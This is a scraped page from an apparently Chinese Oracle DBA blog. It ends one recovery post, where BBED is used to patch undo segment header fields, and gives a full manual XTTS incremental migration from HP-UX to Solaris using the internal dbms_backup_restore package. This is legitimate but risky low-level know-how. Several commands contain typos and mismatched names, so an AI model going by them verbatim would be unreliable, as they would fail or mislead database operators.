BBED> p ktuxc
struct ktuxc, 104 bytes                     @4148
   struct ktuxcscn, 8 bytes                 @4148
      ub4 kscnbas                           @4148     0x70105e77
      ub2 kscnwrp                           @4152     0x0000
   struct ktuxcuba, 8 bytes                 @4156
      ub4 kubadba                           @4156     0x00400084
      ub2 kubaseq                           @4160     0x0024
      ub1 kubarec                           @4162     0x20
   sb2 ktuxcflg                             @4164     1 (KTUXCFSK)
   ub2 ktuxcseq                             @4166     0x0024
   sb2 ktuxcnfb                             @4168     1
   ub4 ktuxcinc                             @4172     0x00000000
   sb2 ktuxcchd                             @4176     63
   sb2 ktuxcctl                             @4178     56
   ub2 ktuxcmgc                             @4180     0x8002
   ub4 ktuxcopt                             @4188     0x7ffffffe
   struct ktuxcfbp[0], 12 bytes             @4192
      struct ktufbuba, 8 bytes              @4192
         ub4 kubadba                        @4192     0x00000000
         ub2 kubaseq                        @4196     0x0024
         ub1 kubarec                        @4198     0x1f
      sb2 ktufbext                          @4200     0
      sb2 ktufbspc                          @4202     656
   struct ktuxcfbp[1], 12 bytes             @4204
      struct ktufbuba, 8 bytes              @4204
         ub4 kubadba                        @4204     0x00400083
         ub2 kubaseq                        @4208     0x0024
         ub1 kubarec                        @4210     0x02
      sb2 ktufbext                          @4212     0
      sb2 ktufbspc                          @4214     7602
注意,这里我们仅仅需要修改ktuxcnfb和ktuxcfbp[1] 即可。其中将ktuxcnfb修改为0,ktuxcfbp[1]中的uba修改为0.
然后再尝试打开数据库,发现顺利打开了数据库,如下:
SQL> alter database open resetlogs;

Database altered.

SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     1000
SQL> alter system set job_queue_processes=0;

System altered.
接着检查了数据库alert log,也没有发现任何的ora-错误。
看到最后,或许大家会觉得很奇怪,为什么会出现这样的故障呢 ?  这里我也跟大家一样困惑。为什么说困惑呢?
因为这库是通过shutdown immediate方式正常停止的。我们都知道,这种方式停库之后,整个Oracle数据库的
文件都是处于一致的状态,重新启动数据库实例后按理说是不需要再进行实例恢复的。
那么为什么这里又出现了这种情况呢?
针对这个问题,我认为有2种可能性:
1、shutdown immediate之后,数据库写入到操作系统cache,还未完全写入到disk上时,此时数据库主机被强行重启;
   由于操作系统cache丢失,导致数据库出现了不一致的情况(本文环境是Linux文件系统)。
2、其他程序或软件破坏了Oracle数据库文件的一致性(实际上,经过了解该环境部署了Rose HA软件;而且
   客户在操作时,据说并没有停止rose ha软件)。
由于客户操作的时间点是凌晨2点,几乎是0业务场景,因此我认为第一种可能性几乎为0;第2种可能性更大。
当然由于我们不了解Rose HA软件的工作机制,这里不便评论。只能说这是一个非常奇怪的case了。
值得欣慰的是,通过我们的努力,很快就帮助客户恢复了系统访问,并且无数据丢失。

Related posts:

  1. database crash with ora-00494
  2. 非归档恢复遭遇ORA-01190 和 ORA-600 [krhpfh_03-1202]–恢复小记
  3. Instance immediate crash after open
  4. Another one recover database case!
  5. 3TB 非归档Oracle数据库恢复小case(windows)

使用XTTS增量进行HP Unix到Soalris Sparc的数据库迁移

$
0
0

本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 使用XTTS增量进行HP Unix到Soalris Sparc的数据库迁移

自从2015年初进行了xtts增量的U2L迁移测试之后,国内很多人都开始利用这种方案进行数据库跨平台迁移了,基本上都是利用Oracle 封装的perl脚本。其中Oracle MOS文档 11G – Reduce Transportable Tablespace Downtime using Cross Platform Incremental Backup (文档 ID 1389592.1) 明确提到目标端环境必须是Linux,这里该文档中的一段原话:

The source system may be any platform provided the prerequisites referenced and listed below for both platform and database are met. The destination system must be Linux, either 64-bit Oracle Linux or RedHat Linux, as long as it is a certified version. The typical use case is expected to be migrating data from a big endian platform, such as IBM AIX, HP-UX, or Solaris SPARC, to 64-bit Oracle Linux, such as Oracle Exadata Database Machine running Oracle Linux.

其实这里很容易让人产生误解,这里Oracle并非说不支持其他平台,而是说Oracle 提供的封装perl脚本不支持而已。但是手工进行xtts操作,完全是ok的经过我的测试也是可行,这里是测试从Hp IA到Solaris Sparc的xtts增量迁移方式,供参考。

1、首先在原端创建测试表空间和测试表.

-创建测试表空间

create tablespace xtts datafile ‘+data’ size 100m;

create table test0504 as select * from dba_objects where 1=2;

alter table test504 move tablespace xtts;

2、备份xtts表空间文件,并传输到目标端(Solaris)

略.

3、目标端进行文件格式转换

convert from platform ‘HP-UX IA (64-bit)’ datafile  ’/tmp/xtts.dbf’ format ‘+DATA/test/datafile/xtts_new.dbf’;

 

 

4、原端进行基于SCN的增量备份(这里由于我是测试表空间,所以未启用Block track  changing)

$ rman target /

Recovery Manager: Release 11.2.0.3.0 - Production on Thu May 4 16:20:45 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

connected to target database: CQDB (DBID=1910815733)

RMAN> run {
set until scn=14528565277766;
allocate channel t1 type disk ;
backup incremental from scn 14528539218186 tablespace 'XTTS'  format '/tmp/xtts_incr1.bak';
release channel t1;
}2> 3> 4> 5> 6> 

executing command: SET until clause

using target database control file instead of recovery catalog
allocated channel: t1
channel t1: SID=3692 instance=cqdb3 device type=DISK

Starting backup at 04-MAY-2017 16:21:06

backup will be obsolete on date 11-MAY-2017 16:21:09
archived logs will not be kept or backed up
channel t1: starting full datafile backup set
channel t1: specifying datafile(s) in backup set
input datafile file number=00941 name=+DATA/cqdb/datafile/xtts.1277.943107855
channel t1: starting piece 1 at 04-MAY-2017 16:21:10
channel t1: finished piece 1 at 04-MAY-2017 16:21:17
piece handle=/tmp/xtts_incr1.bak tag=TAG20170504T162108 comment=NONE
channel t1: backup set complete, elapsed time: 00:00:07

backup will be obsolete on date 11-MAY-2017 16:21:18
archived logs will not be kept or backed up
channel t1: starting full datafile backup set
channel t1: specifying datafile(s) in backup set
including current control file in backup set
channel t1: starting piece 1 at 04-MAY-2017 16:21:26
released channel: t1

 

 

5、创建备份集传到目标端并进行备份集格式手工转换(Solaris)

将脚本保存为xtts_conv1.sql并执行,如下是脚本内容:

 DECLARE
   handle    varchar2(512);
   comment   varchar2(80);
   media     varchar2(80);
   concur    boolean;
   recid     number;
   stamp     number;
   pltfrmfr number;
   devtype   VARCHAR2(512);
 BEGIN
   BEGIN
     sys.dbms_backup_restore.restoreCancel(TRUE);
     devtype := sys.dbms_backup_restore.deviceAllocate;
     sys.dbms_backup_restore.backupBackupPiece(bpname => '/tmp/xtts_incr1.bak',fname => '/tmp/xtts_conv_incr1.bak',handle => handle,media=> media,comment=> comment, concur=> concur,recid=> recid,stamp => stamp, check_logical => FALSE,copyno=> 1, deffmt=> 0, copy_recid=> 0,copy_stamp => 0,npieces=> 1,dest=> 0,pltfrmfr=> 4);
   END;
 END;
 /

 

 

执行结果如下:

SQL> start xtts_conv1.sql;

PL/SQL procedure successfully completed.

 

 

6、进行第一次增量应用(Solaris)

说明:为了验证增量数据是否能够同步到目标端,在进行增量备份之前,

我这里先进行了:

SQL > insert into test0504 select * fro dba_objects where rownm < 101;

SQL> commit;

将如下脚本保存为apply_incr1.sql,并执行:

set serveroutput on;
DECLARE
   outhandle varchar2(512) ;
   outtag varchar2(30) ;
   done boolean ;
   failover boolean ;
   devtype VARCHAR2(512);
BEGIN
   DBMS_OUTPUT.put_line('Entering RollForward');
   -- Now the rolling forward.
   devtype := sys.dbms_backup_restore.deviceAllocate;
   sys.dbms_backup_restore.applySetDatafile(check_logical => FALSE, cleanup => FALSE) ;
   DBMS_OUTPUT.put_line('After applySetDataFile');
sys.dbms_backup_restore.applyDatafileTo(dfnumber =>  941 ,toname => '+DATA/test/datafile/xtts_new.dbf',fuzziness_hint => 0, max_corrupt => 0, islevel0 => 0,recid => 0, stamp => 0);
  DBMS_OUTPUT.put_line('Done: applyDataFileTo');
  DBMS_OUTPUT.put_line('Done: applyDataFileTo');
  -- Restore Set Piece
  sys.dbms_backup_restore.restoreSetPiece(handle => '/tmp/xtts_conv_incr1.bak',tag => null, fromdisk => true, recid => 0, stamp => 0) ;

  DBMS_OUTPUT.put_line('Done: RestoreSetPiece');

  -- Restore Backup Piece
  sys.dbms_backup_restore.restoreBackupPiece(done => done, params => null, outhandle => outhandle,outtag => outtag, failover => failover);
  DBMS_OUTPUT.put_line('Done: RestoreBackupPiece');
  sys.dbms_backup_restore.restoreCancel(TRUE);
  sys.dbms_backup_restore.deviceDeallocate;
  END;
  /

 

 

执行结果如下:

SQL> @apply_incr1.sql
Entering RollForward
After applySetDataFile
Done: applyDataFileTo
Done: applyDataFileTo
Done: RestoreSetPiece
Done: RestoreBackupPiece

PL/SQL procedure successfully completed.

 

 

7、将原端表空间设置为只读模式

SQL> alter tablespace xtts  read only ;

8、进行最后一次增量备份。

run {
allocate channel t1 type disk ;
backup incremental from scn 14528565277766 tablespace 'XTTS'  format '/tmp/xtts_incr2.bak';
release channel t1;
}

 

 

9、将备份集传输到目标端并进行转换

步骤略(同上)

10、最后一次应用增量备份

步骤略(同上)

11、源端导出元数据

将下列内容保存为exp_xtts.par:

transport_tablespace=y
tablespaces=('XTTS')
file=xtts_tab.dmp
log=xtts_tab.log

执行如下命令导出xtts表空间上的元数据信息:

$ exp   \'/ as sysdba\' parfile=exp_tab.par

Export: Release 11.2.0.3.0 - Production on Thu May 4 16:46:28 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Tes
Export done in ZHS16GBK character set and UTF8 NCHAR character set
Note: table data (rows) will not be exported
About to export transportable tablespace metadata...
For tablespace XTTS ...
. exporting cluster definitions
. exporting table definitions
. . exporting table                       TEST0504
. exporting referential integrity constraints
. exporting triggers
. end transportable tablespace metadata export
Export terminated successfully without warnings.

12 目标端导入元数据

将下列内容保存为imp_xtts.par:

transport_tablespace=y
TABLESPACES=('XTTS')
file=xtts_tab.dmp
log=xtts_tab.log
datafiles=(
'+DATA/test/datafile/xtts.dbf')

执行如下命令导入元数据。

-bash-4.4$ imp \'/ as sysdba\' parfile=imp_xtts.par 

Import: Release 11.2.0.4.0 - Production on Thu May 4 17:47:27 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Tes

Export file created by EXPORT:V11.02.00 via conventional path
About to import transportable tablespace(s) metadata...
import done in US7ASCII character set and AL16UTF16 NCHAR character set
import server uses ZHS16GBK character set (possible charset conversion)
export client uses ZHS16GBK character set (possible charset conversion)
export server uses UTF8 NCHAR character set (possible ncharset conversion)
. importing SYS's objects into SYS
. importing SYS's objects into SYS
. . importing table                     "TEST0504"
Import terminated successfully without warnings.

13、检查数据

-bash-4.4$ sqlplus "/as sysdba"

SQL*Plus: Release 11.2.0.4.0 Production on Thu May 4 17:47:35 2017

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> select name from v$datafile;

NAME
--------------------------------------------------------------------------------
+DATA/test/datafile/system.657.943109907
+DATA/test/datafile/sysaux.656.943109911
+DATA/test/datafile/undotbs1.654.943109911
+DATA/test/datafile/users.653.943109927
+DATA/test/datafile/xtts_new.dbf

SQL> select count(1) from test0504;

  COUNT(1)
----------
       100

SQL> select PLATFORM_NAME from v$database;

PLATFORM_NAME
--------------------------------------------------------------------------------
Solaris[tm] OE (64-bit)

SQL> select tablespace_name,status from dba_tablespaces;

TABLESPACE_NAME                STATUS
------------------------------ ---------
SYSTEM                         ONLINE
SYSAUX                         ONLINE
UNDOTBS1                       ONLINE
TEMP                           ONLINE
USERS                          ONLINE
XTTS                           READ ONLY

我们可以看出,xtts表空间已经被迁移过来了,并且增量的数据也已经同步了。

所以我想表达的是,所有的跨平台迁移,其实都可以利用XTTS Incremental Backup 功能进行迁移,无论目标端是什么平台。当然,如果字节序相同的情况下,可以直接使用convert database 功能。

补充:

在进行增量应用时,可能会出现如下错误:

ERROR at line 1:
ORA-19583: conversation terminated due to error
ORA-00600: internal error code, arguments: [2130], [941], [100], [4], [], [],
[], [], [], [], [], []
ORA-06512: at "SYS.DBMS_BACKUP_RESTORE", line 2335
ORA-06512: at line 13

如果遇到这个错误,那么只需要将实例停掉,启动到nomount状态下执行脚本即可。

Related posts:

  1. XTTS(Cross Platform Incremental Backup)的测试例子
  2. 利用XTTS增量进行跨平台迁移遭遇Bug
  3. xtts expdp hung at inital stages
  4. 比特币攻击案例重现江湖
Viewing all 49 articles
Browse latest View live